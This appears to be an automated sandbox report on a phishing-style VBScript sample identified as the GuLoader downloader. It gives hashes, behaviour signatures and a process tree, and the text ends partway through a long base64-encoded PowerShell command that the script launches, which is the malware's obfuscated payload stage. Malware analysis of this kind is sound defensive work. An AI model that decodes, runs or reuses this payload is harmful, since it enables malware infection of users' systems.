Analysis

  • max time kernel
    90s
  • max time network
    148s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    26-09-2022 03:00

General

  • Target

    SOLICITUD DE OFERTA.vbs

  • Size

    181KB

  • MD5

    06acdf5de8b3b26b96a9147836decc49

  • SHA1

    c7e68cbbe9a5ec40e10a2013512c24e768b0c53a

  • SHA256

    12dd0148f02ed0a257b41784311a98b98db4a501f8f94a2b65c5a9bc3cd10451

  • SHA512

    c7fcd25d4e87eaba6996fa07e400d426a36ca07e4e9e723f3e03bd60c0bffd3ca9bfaf1e2eeae49cf0dff85eca0c19b66b0a1904099515478725343a79315cef

  • SSDEEP

    3072:Fmi1FFbPmgq17iT1Kd5nTuZ6RlZ36CsBFX0FevM8K4Ec5CsW:Fh5rmgqKYn6ZWZ36CsBFXAe3EcwB

Score
10/10

Malware Config

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

  • Blocklisted process makes network request 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 9 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\SOLICITUD DE OFERTA.vbs"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3208
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -e "JABGAHIAaQBnAHIAZQBsAHMAIAA9ACAAQAAnAA0ACgBzAGEAeABvAG4AQQBTAHkAbAB2AGUAZABLAHIAdgBlAGQAZABBAG4AcwBnAGUALQBEAGkAYQB6AG8AVABjAG8AbQBpAGQAeQB1AG4AYwB1AHIAcABUAHkAbgBnAGUAZQBNAGkAYwByAG8AIABWAGkAcgBsAGUALQBSAG8AdAB2AGwAVABLAHIAYQB2AGwAeQBTAHAAaQBsAGQAcABDAHIAdQBuAG8AZQB2AGEAbgBkAHAARABCAHUAdABpAGsAZQBLAGkAbgBpAG4AZgBUAHIAaQB1AG0AaQBVAG4AcABhAHYAbgBHAGEAYgBiAGkAaQBUAGkAbABiAGkAdABHAG8AbwBuAGQAaQBNAGkAYwByAG8AbwBJAG4AdABvAGwAbgBUAGUAIABIAG8AIABNAHkAYwBvAHAAQABTAHQAYQB0AHUAIgAKAFMAYQBjAGMAaAB1AEgAeQBkAHIAYQBzAFYAaQBjAGEAcgBpAFcAbwBiAGwAZQBuAE0AaQBjAHIAbwBnAFQAaQBsAGYAbAAgAEkAbQBpAHQAZQBTAFUAdgByAGQAaQB5AFYAcgBuAGcAIABzAE8AbABpAGUAZgB0AFMAdQBuAHMAZQBlAFQAYQBzAGsAbQBtAGQAZQBzAHQAdQA7AAoATQBhAGkAbgBzAHUAUwB0AGkAdgBuAHMARQB4AHAAZQBkAGkAQwByAGEAZABsAG4ATwB1AHQAcwBoAGcAVAByAHUAcwB0ACAAVgBpAHAAZQByAFMAQQBwAHQAZQByAHkAVgByAGQAaQBmAHMAUgBhAGQAaQB1AHQATABpAHYAcwBhAGUARQBnAG4AcwBwAG0AQgByAGEAZAB5AC4AQwBhAHMAdQBpAFIAUABqAGEAdAB0AHUARgBsAGQAZQBuAG4AVABpAGwAYgBhAHQAUwB2AGsAawBlAGkAUABvAHMAdAB5AG0AQQB2AGUAYwBlAGUAUwBhAG0AbABpAC4AVQBuAHMAdAB1AEkAYQBmAG0AeQBzAG4AZgBvAGQAZwBuAHQAQQBzAHAAIABHAGUATgBlAG0AYQB0AHIAUwBoAGUAdABsAG8AVQBuAGQAZQByAHAARABhAGMAbwBpAFMAUwBxAHUAaQByAGUAQwBvAG4AYwBlAHIATABvAG4AIABCAHYASQBtAGIAZQBsAGkAUwB0AHUAZABpAGMAVAB1AHIAaQBzAGUAcwB0AGIAbwBsAHMAUgBhAHQAdABsADsACgBuAG8AbgBkAGUAcABUAG8AcABlAHAAdQBEAGkAcABhAHMAYgBCAG8AZABkAGgAbABUAHIAaQBzAHQAaQBMAGEAdgBhAGcAYwBMAHUAZgB0AGYAIABEAGsAcwBwAGwAcwBhAGsAdABpAHYAdABuAG8AbgByAGUAYQBUAGkAbgBzAG8AdABGAHIAeQBzAGUAaQBDAHIAeQBwAHQAYwBFAHgAbwByAGIAIABTAGsAYQBhAG4AYwBSAGUAbgBkAGkAbABUAG8AbgBpAG4AYQBTAHQAYQB0AHMAcwBwAGEAcgB0AGkAcwBNAGEAcwBzAGUAIABDAHIAbwBjAG8AUQBWAG8AZwB0AGUAdQBBAG4AaQBzAGEAaQBTAG4AbwB0AG4AcgBBAHIAcgBhAG0AawBQAHIAZQB2AGkAcwBMAGkAZwBlAHMAbwBEAGoAcgB2AGgAMQAKAEwAZQB0AHQAaQB7AEEAcgBiAGkAdABbAFIAYQBhAGQAbABEAFAAYQByAHIAaQBsAEYAZQBzAHQAZABsAEcAcgBhAG0AbQBJAFIAZQBjAGwAYQBtAEsAcgB5AHAAdABwAFAAcgBlAHMAZQBvAFMAdABhAG4AbAByAEsAYQBpAHMAZQB0AFcAdQBzAHMAZQAoAEIAZQB0AG8AbwAiAFMAawBzAHAAbwBnAEsAcgB5AHAAdABkAEYAbwByAHQAeQBpAEYAcgBlAGQAcwAzAG0AdQBzAHMAbwAyAFQAdQBiAGIAaQAiAEMAbABpAGYAdAApAE4AYQBlACAAUwBdAFAAYQByAGkAcwBwAEQAaQBzAGMAbwB1AFMAdwBlAGEAdABiAEMAaQB0AHIAdQBsAEYAbwByAHMAawBpAEMAaAByAGkAcwBjAEIAZQBnAGUAagAgAEwAcwBnAHIAZQBzAFIAZQBuAG8AdgB0AE8AcgBuAGEAbQBhAE8AcgBkAGUAbgB0AHIAaABpAG4AYQBpAGsAbAB1AGsAbABjAEgAZQBsAG0AdQAgAEMAaQBjAGgAbABlAHQAcgBhAGMAawB4AEwAZQB0AGYAbwB0AFUAbgB2AHUAbABlAFMAbQBhAHIAdAByAFAAYQBtAGYAaQBuAFMAawBvAHYAbAAgAFIAZQBuAHQAZQBpAFMAZQBuAHQAaQBuAEEAdwBmAHUAbAB0AEcAZQBtAG0AZQAgAEkAbgB0AGUAcgBQAFMAdABvAHIAawBhAGUAdQBrAGEAcgB0AE4AbwBuAGUAeABoAFAAaQBwAGUAcwBUAEIAZQBzAGwAYQBvAEQAZQBsAGsAbwBSAFMAdABvAHIAbQBlAHAAcgBpAG4AdABnAEMAYQByAGIAdQBpAGsAaQBuAGcAcABvAEkAYQBvACAAQQBuAEEAZgBkAGUAbAAoAFAAcgBvAGcAcgBpAEkAbABkAGUAcgBuAE4AbwBuAHMAcAB0AHMAaABlAGUAcAAgAEoAaQBiAHMAIABTAEEAbABzAGkAZAB5AEYAZABzAGUAbABkAEYAbwB1AGwAYgBhAFYAYQByAGUAdQBtAG0AaQBjAHIAbwBlAEQAYQBnAGUAcwApAFMAaQBrAGsAZQA7AAoAQQBzAHQAcgBhAFsAQgBsAGEAbQBlAEQATQBlAGwAZAByAGwAUwBhAGwAdQB0AGwAUgBvAG8AZgBlAEkAQQBtAGkAbgBvAG0AUgBlAGEAcwBzAHAAQQBuAHQAaQBjAG8AQQBzAGMAbwBwAHIAZABlAGwAYQB3AHQAQQByAG4AZQBzACgARABpAGUAdQB4ACIAUwB0AGUAbQBtAGcASwBhAHAAaQB0AGQAUgBlAGUAbgBzAGkAcwBuAGkAdgB5ADMASABlAHQAZQByADIAUwB0AG8AcgBtACIAVAByAGkAawBvACkARQB4AG8AYwBvAF0AVABqAGEAbABkAHAARQByAGkAYwBoAHUASwBvAHIAcgB1AGIAQQBkAHIAZQBzAGwAQQBuAGMAaAB1AGkAUgBhAG4AZABzAGMARgBhAHYAZQBsACAATgB1AGQAaQBzAHMARQBuAGcAcgBhAHQAQgBvAHUAbgBkAGEASwBhAHYAYQBzAHQASQBuAGkAdABpAGkAQwBlAGkAbABvAGMAUgBhAGsAbABlACAAUgBlAGYAZQByAGUATwB2AGUAcgBhAHgASQBuAGMAbwBtAHQAQQB1AHQAbwBuAGUASABlAG0AaQBwAHIAUAByAGUAYQBkAG4AVQBuAHYAZQByACAAUgBvAHUAZwBoAGkAQQBzAGkAZQBuAG4AVwBpAG4AZABsAHQAVAByAHkAawB0ACAASwBvAG4AcwBlAEcASAB1AG0AYQBuAGUATABhAG4AZwBiAHQARABvAGsAdQBtAEQARQBzAGsAYQBwAGUAYQB0AGgAcgBpAHYAUwB1AGwAcABoAGkAUwBhAG4AdABpAGMAUgBlAGwAYQB0AGUAQgBhAGMAawB3AEMAUABvAHMAdAB1AGEASwBsAG8AYQBrAHAASwBvAGwAbwBuAHMAVQBuAG0AeQB0ACgAaQBtAG0AbwByAGkAQwB1AGIAbABhAG4AUABhAHIAYQBtAHQATgBpAGcAaAB0ACAAUgBlAG0AbwBsAE0AUwBvAG4AbwByAGEAQgB1AHQAaQBrAHMAVABvAHIAbwB1ACwATQBvAGQAaQBsAGkAVQBuAGQAZQByAG4AUwB0AHIAawBtAHQASABvAHIAbgBzACAARABlAG4AdABpAEgAQwBpAHYAZQB0AGUAYgBhAGQAZQBtAG0ARwBhAG4AZwBlAGkARgBuAHkAcwB0AHQAQQBjAHkAYQBuACkAUwB0AGEAdAB1ADsACgBVAG4AdQBzAGEAWwBCAHIAZQBhAGQARABTAGsAcgBwAGUAbABSAHUAbgBkAGUAbABmAG8AcgBlAHMASQBBAHUAdABvAGkAbQBTAHQAYQBuAGQAcABUAHMAdAByAHkAbwBTAGEAbQBiAG8AcgBTAGsAeQBsAGQAdABCAHUAcgBnAG8AKABHAGUAbwByAGcAIgBQAHIAZQBkAGkAawBBAHUAZABpAG8AZQBDAGUAcgBjAGkAcgBHAHkAbQBrAGgAbgBVAGQAZwBpAHYAZQBBAHIAawBpAHQAbABVAGQAawBvAG4AMwBDAG8AaQBuAHMAMgBGAGwAZQBtAG0AIgBBAGQAdQBsAHQAKQBWAG8AawBzAGUAXQBSAGUAYgB1AGsAcABGAG8AcgBiAGkAdQBQAGEAdwBuAGIAYgBSAGUAZgBlAHIAbABHAGUAbgBlAHIAaQBGAGUAcgBpAGUAYwBEAGUAYQBsAHMAIABBAHQAdABlAG4AcwBVAHAAZwBhAG4AdABPAGYAZgBlAG4AYQBEAGEAYQBiAHMAdABWAGEAcgBtAGUAaQBQAGEAcgBhAGMAYwBTAHQAdQBiAGIAIABLAHIAbwBuAGUAZQBTAGkAawBrAGUAeABTAGsAYQB0AGUAdABBAGYAZwByAGUAZQBFAHAAZQBuAGQAcgBTAHAAbwByAHYAbgBTAG4AeQBsAHQAIABTAG4AYQBwAHMAaQBUAHIAZQBmAG8AbgBTAGkAYwBpAGwAdABTAHAAaQByAGEAIABFAGwAdgBlAHIATABVAHIAdQBnAHUAbwBGAGkAZwB1AHIAYQBUAHIAZQByAHUAZABPAG0AZwBhAG4ATABUAGUAbQBwAGUAaQBWAHIAZABpAHMAYgBSAGUAYQBhAGwAcgBQAHIAZQBkAGkAYQBBAG4AaQBtAGUAcgBVAG4AYwBvAG4AeQBzAG4AaQBmAGYAKABMAGEAbgBvAHMAaQBSAGkAbgBnAGIAbgBKAGUAdABzAHQAdABzAHAAZQBqAGwAIABLAHIAeQBzAHQAUwBHAHIAdQBiAGIAawBGAG8AZQBkAGUAYQBBAHIAYgBlAGoAdABOAG8AdABlAGQAdABNAGUAZABiAG8AKQBGAG8AcgBlAGQAOwAKAE4AZQBiAHUAbABbAEsAbABvAGsAawBEAEEAdAB0AGUAbgBsAFAAdQBwAHAAZQBsAGEAZgBmAGEAbABJAFcAbwBvAGwAZQBtAFUAZABsAG8AcwBwAE8AdQB0AGYAaQBvAEYAZQBuAHUAZwByAEUAbABsAGEAbgB0AEEAdABhAHIAaQAoAFMAcABvAG8AbgAiAGYAYQByAG0AcwBrAGgAYQBpAHIAbABlAFMAcABlAG4AYwByAFAAYQByAHQAbgBuAFMAbgBrAG4AaQBlAFIAZQBzAGsAbgBsAEQAaQBhAHMAcAAzAEoAZQBiAGUAbAAyAEkAbQBwAGEAcgAiAEYAaQBkAGcAZQApAE8AbQBnAG4AZwBdAFAAcgBlAGEAYwBwAEQAYQB5AGwAaQB1AEYAbwByAGIAcgBiAEYAbABhAGcAZQBsAEwAZQB0ACAAQgBpAEEAZgBrAHIAaQBjAFMAcABlAGsAdAAgAEgAbwBtAG8AcwBzAE4AbwBuAGMAbwB0AFMAaQB0AHQAcgBhAEkAbgBkAHQAcgB0AFAAYQByAGsAZQBpAFAAYQByAGEAbQBjAEEAYgBiAHIAZQAgAHMAZQBsAHYAZgBlAEYAdQBnAGwAZQB4AFQAcgBpAHUAbQB0AFQAdQBnAHQAZQBlAFQAYQBiAG8AcAByAEsAbgBhAGwAZABuAHIAZQBjAHIAbwAgAEkAbgB0AGUAcgBpAFMAdAByAGEAaQBuAEYAbABvAHIAZQB0AFMAbwBqAGEAawAgAFQAYQBuAGsAZQBTAEsAcgBvAGsAZQBlAEEAcgByAGEAbgB0AFIAbwBjAGsAZQBWAFAAbABhAGQAZQBvAEYAbwByAHIAYQBsAEQAbQByAGkAbgB1AFMAdABkAHAAdQBtAFQAawBrAGUAbABlAFMAcAByAGcAZQBMAEsAbgBpAHAAbABhAEEAbQBtAHUAbgBiAE0AYQBjAGEAYwBlAEIAbwByAGQAZQBsAEIAbwBnAHMAdAAoAE0AZQBuAHUAcgBpAFMAdQBiAHMAdABuAEMAbwByAGkAbgB0AEMAbwByAG4AZQAgAGEAbgB0AGkAdwBzAFoAYQBuAG4AZQBhAFAAcgBvAGoAZQB1AE0AbwB1AHMAZQAsAEIAYQBkAG4AZQBpAEMAaABhAHAAZQBuAFMAbwBkAGEAdgB0AEYAaQByAGwAaQAgAFQAZQBrAHMAdABDAE0AZQB6AHoAbwBvAFQAaQBsAHIAZwBuAG0AYQBzAGsAaQB0AEsAYQBuAGQAaQBhAFIAZQBpAG4AdwApAFQAaAB1AGQAZAA7AAoATQBhAGgAYQByAFsAUgBlAHQAcwBrAEQASABhAGMAawBiAGwARgBhAG4AZQBiAGwAQQBtAHIAZQBlAEkAVABlAG0AYQAgAG0AVQBkAGIAeQB0AHAATgBvAG4AcwB1AG8AUgBvAGMAawB3AHIARQB4AHQAZQBuAHQASQBuAGQAZQBuACgAYwBvAG0AcABlACIARQBlAGwAcABvAHUASABhAGwAZgB1AHMARQB5AGUAcwB0AGUATwBuAGMAbwBsAHIARgBvAHIAdAB5ADMAUABlAHIAagB1ADIAZgBvAHIAcwB2ACIASQBuAHQAZQByACkAUwBhAG0AbQBlAF0ATQBpAGwAZABsAHAAVQByAG8AawBrAHUASwBsAGkAbgBnAGIAVAByAGEAcABhAGwAYgB1AHIAbABlAGkAVgBvAG4AcwAgAGMAcwBvAGwAZgBhACAARQB4AG8AcgBoAHMAQQBuAHQAaABpAHQAQgBsAGEAbgBrAGEAQQBuAHQAaQBtAHQARQBqAGUAbgBkAGkASwB2AHMAdABlAGMASABvAHMAcABpACAARgBvAHIAYgB1AGUASABvAHYAZQBkAHgAQwBhAGwAYwBpAHQASABvAHYAZQBkAGUAWgBpAHIAYwBvAHIATwB1AHQAdABvAG4AbwB2AGUAcgB0ACAASQBkAGMAdQBlAGkATABvAHUAcABlAG4AUABzAGUAdQBkAHQAUABvAGwAbwBuACAAQgByAHkAbgBqAE8AUwBhAGwAdABvAHAAUwBjAGEAbABmAGUATwBwAGgAaQB0AG4AVABpAGwAcwB0AFcAbwBwAG0AcgBrAGkARwByAG8AdAB0AG4AQwBoAGUAZwBvAGQAUAB1AHIAYgBlAG8AUwBlAGwAdgBmAHcARgByAGEAdABlAFMAUAByAGEAYwB0AHQAVQBkAHMAawByAGEARgByAHUAZwB0AHQARABlAGsAYQBnAGkAQQBiAHUAcwBlAG8AUwB0AGUAbQBwAG4ATwB1AHQAYgBiACgAUAByAGUAYQBjAGkAVQBkAG8AawB1AG4AQQBiAG8AdQBuAHQARgB1AHMAaQBvACAAVAByAGEAbgBzAFQAUwBhAHQAaQByAGkARgBvAGwAawBlAGcARQBwAGkAbgBhAGcATwBwAHAAcgBlACwATwBtAGQAYgB0AGkAQQB1AGsAdABpAG4AUwBwAGgAaQBuAHQARQBuAHQAZQByACAAUABoAGEAbgBlAHUAUAByAGUAZABpAGQAUgBvAHQAdQBuAG4ASwBhAGwAZABlAHYAZABhAGcAaQBuAG4ATQBhAGMAcgBvACwAdgBhAG4AbQBkAGkAUwBhAGwAYQBhAG4AUwB0AGUAbQBtAHQARABlAGsAbABhACAAUABvAHMAdABuAE0ARgBuAGcAcwBlAGUAQQBuAG4AYQBtAGQAUgBlAHMAbwBuAGIAQwBpAHYAaQBsACkASgBhAG4AbwBzADsACgBSAG8AZABsAHMAWwBEAGkAcwB0AGkARABTAHQAaQBsAGUAbABEAHUAbgBjAGkAbABCAGEAbgBkAGEASQBSAGgAbwBuAGMAbQBTAHQAZQBtAG4AcABBAGYAbABiAHMAbwBEAGUAbQBlAHIAcgBHAGUAcgByAGkAdABZAGQAZQByAGcAKABNAGkAYwByAG8AIgBTAGkAbABlAHQAawBBAGsAaABtAGkAZQBGAGEAcgBhAGQAcgBBAHQAYQByAGEAbgBrAHIAYQBrAGsAZQBVAG4AdgBpAGIAbABBAHIAYgBvAHIAMwBSAG8AdwBpAG4AMgBNAGUAcwBpAG8AIgBSAGUAcwBlAG4AKQBUAGUAbABlAG4AXQBKAGkAZwBnAGwAcABUAGEAYgBpAHQAdQBHAHIAdQBuAGQAYgBHAGEAcgBkAGkAbABHAGEAaQBsAGwAaQBTAHQAYQBuAGcAYwBVAG4AcwBlAG4AIABUAGkAbABmAGwAcwBGAG8AcgBsAGEAdABSAGEAbQBoAGUAYQBzAGEAbgBhAHQAdABDAG8AcgByAG8AaQBHAG8AZABkAGEAYwBHAGcAbABlAHIAIABMAHUAZgB0AGsAZQBQAG4AZQB1AG0AeABLAGEAbgBjAGUAdABCAGEAcgBrAHMAZQBQAG8AbABhAHIAcgBHAHIAdQBuAGQAbgBFAG4AaQBzAGwAIABUAHIAYQBhAGQAaQBTAGUAcgB2AG8AbgBDAGEAbAB2AGkAdABwAGEAcgBhAG0AIABUAHIAbwBsAGQARwBTAG0AbQBlAHMAZQBiAGUAbQBhAG4AdABTAHQAZQBlAHAAVQBTAGEAbgBkAHcAcwBBAG4AZwB1AGkAZQBGAGEAbQBpAGwAcgBSAGkAbwB0AGkARABFAGYAdABlAHIAZQBWAHUAcgBkAGUAZgB0AGUAbgBhAG4AYQBOAG8AbgBpAG0AdQBPAHYAZQByAGEAbABNAGEAdgBlAHIAdABCAGkAZwBhAG0ATABFAG4AdABvAG0AQwBjAG8AbABvAG4ASQBPAHYAZQByAHYARABEAGEAdABhAGcAKABVAGQAcwBsAHkAKQBBAHUAcgBpAGsAOwAKAGcAZQByAHkAIABbAEsAaQBkAG4AYQBEAFYAcgBkAGkAdABsAHUAbgB1AHMAZQBsAE8AYgBzAHQAZQBJAEYAbwByAHMAdABtAFIAbwBzAGUAdwBwAEUAZwBhAGwAaQBvAFUAbgBpAHgAIAByAFMAdgBlAGoAcwB0AEEAZgBhAGMAaQAoAFQAaQBsAGcAbgAiAGEAYQByAHMAYQBrAFMAawByAGkAZABlAE0AZQB0AGEAcwByAHMAdgB2AG4AaQBuAEkAYwBlAGIAZQBlAEIAZQBhAHQAYQBsAEwAYQB0AHQAZQAzAE4AbwBuAHAAbAAyAEMAZQBsAGwAbwAiAEYAZQBsAHQAbwApAEUAZgB0AGUAcgBdAE0AbwBkAHIAZQBwAEEAbgBhAGwAeQB1AEIAYQByAGIAaQBiAFYAawBrAGUAbABsAHUAZABzAG8AbgBpAEQAZQBjAGkAZABjAFMAdABlAGcAZQAgAE4AYQBnAGwAZQBzAEEAYgBhAGwAYQB0AEoAbwBsAHQAcABhAGEAbABwAGEAawB0AGQAZQBtAGEAcgBpAGIAbwBjAGMAaQBjAE4AeQBoAGUAZAAgAEcAYQBuAGoAYQBlAFAAYQByAHQAcgB4AEcAcgBvAHQAaQB0AEYAaQByAGUAZABlAEEAYgBhAHMAaAByAE0AaQBjAGgAZQBuAEUAeABjAHUAcgAgAEMAbwBsAGwAaQBJAEUAdQB0AHIAbwBuAFMAYwBvAHIAZQB0AEEAegBvAHQAaQBQAEsAcgBvAG4AaQB0AFAAeQByAGEAbgByAFIAZQBnAGkAbQAgAEMAYQBwAHIAaQBFAFUAbgBpAG4AaQBuAFAAYQByAG0AbwB1AE0AeQBzAHQAaQBtAEMAbwBuAHQAcgBTAEIAYQBsAG8AdwB5AFMAdABlAHIAbgBzAEEAbgB0AGkAbAB0AFAAbABhAGkAcwBlAEIAcgBpAHMAdABtAEIAcgBvAHcAZABMAGUAbgBkAG8AbABvAHQAbwByAHQAaQBjAEkAbgBzAGMAcgBhAEYAbwByAHMAawBsAE0AbwBsAGEAcgBlAEEAawB0AHUAYQBzAEEAYwByAGkAdABBAFMAdQBzAHAAZQAoAFMAcABlAGQAaQB1AFcAcgBpAHQAaABpAFAAbwB1AHIAcQBuAE0AaQBzAHMAZQB0AEEAbABwAGUAbgAgAFAAYQB0AHQAZQB2AEUAbABtAGUAdAAxAEEAcwBuAGUAcgAsAFIAZQBpAG4AdABpAEsAbwBnAGwAZQBuAEsAbwBpAG4AYwB0AFAAaQBiAGUAawAgAFUAbgBnAGkAbAB2AEkAbgB0AGUAcgAyAEQAdQBwAGwAaQApAEsAYQBnAGUAcwA7AAoAQgBlAG4AegBhAFsASgBvAHIAZAByAEQATQBvAGQAaABhAGwAVQBuAGIAZQBuAGwAVABlAGsAcwB0AEkATwBwAGwAcgBpAG0AUwB0AHIAYQBuAHAAQwBoAHIAbwBtAG8AQQB0AHQAYQBjAHIAVwBhAHkAegBnAHQARQBwAGkAcwB0ACgARwBlAG4AZQByACIAVgByAGkAbABsAHUAQQBmAHIAdQBuAHMATwBwAHAAdQBnAGUASABlAG0AbQBlAHIAQwBvAGUAbgBvADMASwBvAG0AYgBpADIAQQBiAGUAYQBtACIAQQB6AG8AdABlACkAbABhAGQAZQBnAF0AQQBsAGwAaQBnAHAATgBvAHQAZQBmAHUAVABpAG4AZwBmAGIAQwBlAHQAcgBhAGwAVABlAG8AbABvAGkAVABlAGcAdQBsAGMAQQBuAGkAcwBvACAAUAByAG8AZwByAHMAUwBlAGwAdgBiAHQAUwBrAGkAZABlAGEASQB2AGEAbABvAHQAWQBuAGsAdgByAGkARABvAGwAbABpAGMARwByAHUAbgBkACAARABlAG8AZABvAGUAUwB0AHIAaQBzAHgARgBpAGIAcgBvAHQAQgBpAGwAaQB0AGUAQwBoAGEAbQBiAHIAVQBkAG0AYQB0AG4AQgBpAGIAbABpACAAUwB2AG8AdgBsAGkAUwBvAGMAaQBhAG4AcwB5AGwAZABzAHQATABhAGIAcgBhACAATgBlAG8AbwByAEcATABuAGcAZABlAGUASQBuAGYAbwByAHQATAB5AG4AYQBzAEMARgBvAHIAZQBiAGwASwB1AGwAdAB1AGEAVAByAGUAbQBvAHMAVQBnAGUAbQBhAHMAUABhAHIAbwBsAEwAUgBlAHQAdwBpAG8AUABlAHAAdABvAG4ARwB2AGkAbgBrAGcARwBhAHIAZwBhACgARgB1AGcAdABpAGkASwBsAGEAcgBoAG4ARgBvAHIAaABhAHQATgB5AHQAdABlACAATgBhAGsAYQB5AFIATQBpAGMAZQBsAGUAUwB5AG4AbwBkAHYAUwBsAG8AbQBtAGkASwBhAHIAZwBhAGwAQgBlAGsAbABhAGUAbgBvAG4AdwBhACwAVQBzAGUAbABzAGkAQgB1AGcAaQAgAG4ASABqAGUAcwB0AHQASQBuAGYAbAB1ACAATwB0AGgAZQByAFIARgBsAGUAdAB0AGUAVQBuAHMAZQBuAGgAVABlAGEAdAByAG8ASABvAHYAZQBkAGkAVQBkAHMAdAB0AHMAUAB1AHIAIABGACkAUAB1AHAAaQB2ADsACgBSAGUAaABhAHIAWwBOAG8AbgBkAGUARABUAGEAcgBpAGsAbABTAGUAbQBlAHMAbABWAGkAZQB0AGMASQBIAGUAeABhAGIAbQBFAGYAZgBsAGEAcAB0AHIAaQBnAHMAbwBEAGkAcwBnAHIAcgBQAGUAcgBzAG8AdABTAGsAdQBsAGsAKABGAG8AcgB0AGoAIgBCAG8AZQByAG4AawBMAGEAbgBnAHQAZQBQAHMAeQBjAGgAcgBWAGkAcgBrAG4AbgBCAGkAbwBlAGMAZQBVAG4AcwB0AG8AbABTAGsAbwBsAGUAMwBGAG8AcgBlAG4AMgBDAGEAcgBwAGUAIgBUAHIAYQBkAGkAKQBLAG8AZwBsAGUAXQBTAHUAYgBhAHIAcABHAGwAZQBkAGcAdQBVAG4AYwBoAGUAYgBaAHkAZwBvAHMAbABCAGEAbABhAG4AaQBPAHYAZQByAHQAYwBzAHAAbwByAHQAIABDAG8AbQBtAGkAcwBiAGUAcwBvAHYAdABPAHAAZQByAGMAYQBEAGkAbQBpAHQAdABGAG8AbABpAGwAaQBSAGQAbQBlAGQAYwBEAGEAdABhAHQAIABCAGkAcgBsAGUAZQBEAGEAeQBhAGIAeAByAGUAYwBvAHIAdABhAHQAcgBlAGIAZQBGAG8AcgBlAHMAcgBLAHIAbwBwAHMAbgBOAGEAdAB1AHIAIABwAGEAcgBhAGwAaQBIAG8AbQBlAGwAbgBVAGQAdAByAHkAdABjAGwAYQB1AGQAIABCAHIAZQBtAHMAVgBEAGkAYQBnAG4AaQBFAGwAZgBlAG4AcgBGAGkAbgBnAGUAdABzAHIAdABpAGwAdQBMAGkAZwBhAGUAYQBSAGUAdABzAG0AbABEAGUAYwBlAG0AQQBTAHQAaQBsAGkAbABuAGUAZwBsAGUAbABGAGkAcgBlAHIAbwBqAGEAYwBrAHIAYwBUAHIAeQBrAGwAKAByAGUAZABpAHMAaQBQAGUAcgBpAG8AbgBSAHUAbgBkAHQAdABDAG8AaQBzAHQAIABOAGEAYgBhAGwAdgBFAGQAbQBhAHMAMQBTAGIAbABhAGQALABLAHIAaQBnAGUAaQBlAGYAZgBlAHQAbgBNAHUAbgBkAHMAdABBAHUAdABvAG8AIABWAGEAcgBtAHQAdgBGAGoAZQByAG4AMgBPAGwAYQB2AHMALABTAG0AaQB0AGkAaQBCAGEAZwBzAGkAbgBBAHMAeQBtAHAAdABjAG8AdQByAHQAIABEAGUAdABvAHgAdgBDAG8AbgBuAG8AMwBCAGEAcwBpAGQALABJAG0AcAByAG8AaQBiAGUAcgBhAGsAbgBDAGEAYwBvAGwAdABUAGkAbAB0AHIAIABGAG8AcgBkAHkAdgBSAGUAZwBpAG0ANABGAHIAbwBzAHMAKQBkAGkAcABoAGUAOwAKAEsAeQB0AG8AbwBbAFAAbABlAHUAcgBEAEYAYQBzAHQAZQBsAEMAaABpAGYAcgBsAEkAbgBmAG8AcgBJAFMAdQBwAGUAcgBtAGsAYQB0AHQAZQBwAE4AZQB1AHIAbwBvAFAAYQBuAHMAYwByAEIAdQBrAGwAZQB0AEYAdQBtAGEAcgAoAFIAZQBjAHQAaQAiAFUAbgBkAGUAcgB3AFIAZQB0AHIAYQBpAEcAcgBpAHMAawBuAFQAcgBuAGUAdABzAEEAawBhAGQAZQBwAEEAbgBpAG8AbgBvAFQAYQBwAGgAdQBvAFQAZQBsAGUAcABsAEgAeQBzAHQAZQAuAFMAawBhAGwAYQBkAEEAYQBiAGUAbgByAEsAYQBmAGYAZQB2AFQAaQBsAGcAbwAiAE0AbwB2AGUAcgApAFIAZQBsAGEAdABdAEEAdAB0AHIAYQBwAEgAYQBuAGQAcwB1AEwAZQBwAHQAbwBiAGUAcgBpAHQAcgBsAHAAcwBlAHUAZABpAFAAcgBvAHAAaABjAGgAbwBhAGMAdAAgAFAAbABlACAARgBzAEMAbwBsAG8AcgB0AEQAaQBhAHQAbwBhAGEAbABpAHkAYQB0AFQAaQBlAHIAYwBpAEUAbgBxAHUAaQBjAFMAeQBkAGcAYQAgAEgAbwBmAGwAZQBlAFUAZgBvAHIAZAB4AEIAaQBmAGkAZAB0AEQAYQBhACAAVgBlAEMAYQByAG8AYQByAHIAZQBzAGUAYwBuAFMAaQBnAGkAbAAgAFAAYQByAGMAZQBpAFMAdABvAGMAawBuAEIAbwBuAGkAZgB0AEwAZQBpAHMAdQAgAEkAcwBjAGgAZQBFAGMAYQByAHIAeQBuAEIAYQBjAGkAIABkAEkAbgB2AGUAcwBQAEwAbgBzAHQAaQBhAFQAZQBlAHQAbwBnAFIAZQBzAGwAYQBlAEQAaQBzAGMAbwBQAEgAZQByAG0AZQByAGsAcgBhAHQAZQBpAFAAYQByAG8AbgBuAEEAcgBiAGkAdAB0AEQAdQBhAGwAaQBlAEEAZgBvAHUAbgByAFIAZQBpAG0AYQAoAE0AdQBsAHQAaQBpAFAAbABhAG4AYwBuAFYAZQBuAGUAcwB0AEkAbgB0AGUAcgAgAEUAZgB0AGUAcgBGAEwAdQBjAGkAZgBsAE0AYQB0AHQAZQBhAEQAaQBhAGIAZQBkAFUAbgBvAGIAdgB2AG8AYgBsAGEAdAApAEQAYQBsAG0AYQA7AAoAUgB5AGsAZQAgAFsAUwBrAGEAZwAgAEQAVABhAHUAdABvAGwAQQBuAGEAbAB5AGwAQQBmAHYAbgBuAEkAQQBmAHMAdABpAG0AVABvAHIAdABvAHAAQgBpAGYAaQBnAG8ASABlAGwAcwBlAHIAQQBmAHIAZQB0AHQATgB